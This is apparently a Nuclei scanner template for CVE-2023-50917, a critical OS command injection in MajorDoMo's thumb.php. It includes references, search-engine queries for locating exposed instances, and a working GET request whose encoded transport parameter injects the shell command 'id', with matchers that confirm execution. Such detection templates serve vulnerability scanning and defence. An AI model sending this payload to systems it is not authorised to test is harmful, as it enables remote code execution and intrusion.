id: CVE-2023-50917 info: name: MajorDoMo thumb.php - OS Command Injection author: DhiyaneshDK severity: critical description: | MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. reference: - http://packetstormsecurity.com/files/176273/MajorDoMo-Remote-Code-Execution.html - http://seclists.org/fulldisclosure/2023/Dec/19 - https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178 - https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac - https://nvd.nist.gov/vuln/detail/CVE-2023-50917 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-50917 cwe-id: CWE-77 epss-score: 0.71101 epss-percentile: 0.97965 cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: mjdm product: majordomo shodan-query: http.favicon.hash:1903390397 fofa-query: app="MajordomoSL" tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os http: - method: GET path: - "{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B" matchers-condition: and matchers: - type: regex part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - 'rtsp_transport' condition: and - type: status status: - 200 # digest: 4a0a004730450220595b1f4c2aad492c7ab53117f7f5878c7d2174357e2700274d277e89dc4b74c5022100ec8ce13cf48cb89871ddb8f797b38eb2776b8811e860285e586747386d5158c4:922c64590222798bb761d5b6d8e72950